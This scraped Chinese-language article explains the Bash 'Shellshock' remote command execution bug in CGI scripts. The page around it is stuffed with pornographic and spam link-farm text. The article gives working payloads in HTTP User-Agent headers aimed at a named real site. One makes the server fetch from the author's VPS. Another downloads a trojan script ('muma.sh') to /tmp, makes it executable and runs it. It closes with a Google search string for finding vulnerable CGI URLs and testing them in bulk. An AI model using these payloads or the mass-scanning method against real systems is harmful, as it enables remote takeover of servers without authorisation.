成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Bash遠程解析命令執行漏洞測試方法

安全 漏洞
Bash漏洞與“心臟出血”漏洞不同,“心臟出血”只能借助竊取用戶電腦信息,而bash 漏洞允許黑客遠程控制電腦,拿到系統最高權限!其方法利用就更簡單了——復制/粘貼一行命令代碼即可!

從昨天開始,這個從澳大利亞遠渡重洋而來的BASH遠程命令執行漏洞就沸騰了整個FreeBuf,大家都在談論,“互聯網的心臟又出血了”,可是,親,到底怎么對網站進行測試?下面這段腳本

$ env x=‘() { :;}; echo vulnerable' bash -c "echo this is a test"

真的如各路大神們說的這樣嗎?

它與“心臟出血”漏洞不同,“心臟出血”只能借助竊取用戶電腦信息,而bash 漏洞允許黑客遠程控制電腦,拿到系統最高權限!其方法利用就更簡單了——復制/粘貼一行命令代碼即可!

Bash漏洞為什么能夠執行

Bash漏洞的原理:

BASH除了可以將shell變量導出為環境變量,還可以將shell函數導出為環境變量!當前版本的bash通過以函數名作為環境變量名,以“(){”開頭的字串作為環境變量的值來將函數定義導出為環境變量。

此次爆出的漏洞在于BASH處理這樣的“函數環境變量”的時候,并沒有以函數結尾“}”為結束,而是一直執行其后的shell命令。

簡單地說就是,Bash腳本在解析某些特殊字符串時出現邏輯錯誤導致可以執行后面的命令。

Bash漏洞與遠程執行有啥聯系

看到上面的解釋,很多童鞋都理解成了本地的漏洞,然后很多人又覺得,本地有啥可以利用的,于是就忽略了這個神級漏洞的存在。我想說的是,這個漏洞,利用熱度可以媲美當年的MS08-067,威力雖然弱了點,但遠程控制電腦還是可以的。

首先解釋一下cgi腳本。很多網站類似下面的鏈接:

GET http://help.tenpay.com/cgi-bin/helpcenter/help_center.cgi?id=20HTTP/1.1

后臺不僅僅用python、Perl來解釋執行并反饋給客戶端Response,當然還可以換做bash腳本來解釋執行提交上來的GET/POST請求。所以,理論上,你在HTTP請求中插入一個Bash命令,比如

() { :;}; wget http://www.myvps.org/testvul.sh

如果服務器的Bash解釋器具有這個漏洞,那么在解釋上面這這句話的時候就會執行wget請求,將一個惡意的testvul.sh文件下載到這個服務器,那為何說要放在HTTP頭部呢?比如:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

這是因為這個漏洞是bash解釋器在解釋某些特殊的變量時才可以觸發的:

在于BASH處理以“(){”開頭的“函數環境變量”的時候,并沒有以函數結尾“}”為結束,而是一直執行其后的shell命令

通過自定義這些參數的值為“函數環境變量”的形式,就可以觸發后面的命令,惡意的客戶僅需要發送特殊構造的HTTP請求就可以使服務器執行特定的命令(命令的權限和解釋HTTP請求的Bash腳本環境相同)。

實際測試中,我的構造的測試請求:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget http://myvps.org/remember_client_ip.php
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

過程是這樣的:

我發送GET請求–>目標服務器cgi路徑

目標服務器解析這個get請求,碰到UserAgent后面的參數,Bash解釋器就執行了后面的命令

目標服務器wget–>我的myvps.org

我的vps記錄下這個訪問的IP地址

然后查看我的myvps.org服務器的訪問記錄,就可以確定目標有沒有去訪問,如果訪問了,那么,很好,它是有漏洞的。下面是我的VPS接收到的wget請求訪問的日志:

Bash遠程解析命令執行漏洞測試方法 

#p#

 

大神是這樣測試漏洞的

當然,你也可以這樣構造:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget -O /tmp/muma.sh ;chmod 777 /tmp/muma.sh; ./tmp/muma.sh
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

實際上執行了下面三句:

/usr/bin/wget -O /tmp/muma.sh http://myvps.org/muma.sh ;
chmod 777 /tmp/muma.sh;
./tmp/muma.sh

你會發現,你的木馬就這么腳本了,這就是Bash漏洞利用的精髓。

當然,你可以利用批量Google搜索:

filetype:cgi inurl:cgi-bin site:jp

然后批量提交類似的GET請求,你就能做到批量測試了。測試表明,500個url里有6-8個有bash漏洞

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2010-09-13 17:57:12

執行漏洞

2010-09-17 16:01:55

代碼執行漏洞EXE文件

2022-05-07 11:31:25

漏洞網絡攻擊

2021-01-26 10:00:45

漏洞網絡安全網絡攻擊

2015-03-06 15:31:01

2016-11-08 19:56:09

GitLab漏洞遠程命令

2013-12-20 10:20:34

2016-09-29 14:37:39

ImageMagick漏洞分析

2014-09-25 19:30:51

2023-12-14 16:20:09

2019-05-15 15:20:01

微軟漏洞防護

2011-08-04 13:53:04

2020-10-08 13:44:27

漏洞

2017-08-22 13:45:27

2015-04-30 08:11:40

2014-09-12 17:47:36

2014-08-27 16:22:19

2017-06-15 17:28:36

2017-06-14 10:02:22

2014-10-29 15:44:55

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 精品1区2区| 成人黄色在线视频 | 91久久久久 | 日干夜操| 一区二区三区视频在线观看 | 久久高清 | 91国自产 | 精品国产1区2区3区 一区二区手机在线 | 国产一区中文字幕 | 日韩在线电影 | 日韩a视频| 综合久久亚洲 | 九九热精品在线 | 一区二区三区视频在线 | 久久精品国产免费 | 国产一区999 | 亚洲精品在线视频 | 草b视频 | 91精品国产一区 | 久久久成| 91精品亚洲| 成人激情视频网 | 午夜在线免费观看 | 激情视频中文字幕 | 国产精品福利视频 | 国产欧美精品一区二区三区 | 久久中文字幕一区 | 亚洲视频一区在线观看 | 亚洲精品永久免费 | 亚洲欧美日韩精品久久亚洲区 | 澳门永久av免费网站 | 国产精品色av | 精品一级 | 亚洲国产精品久久 | 精品无码久久久久国产 | 日韩av成人在线观看 | 欧美日韩亚洲一区 | 亚洲国产精品久久久久婷婷老年 | 欧美激情精品久久久久久免费 | 国产日韩欧美激情 | 成人午夜电影在线观看 |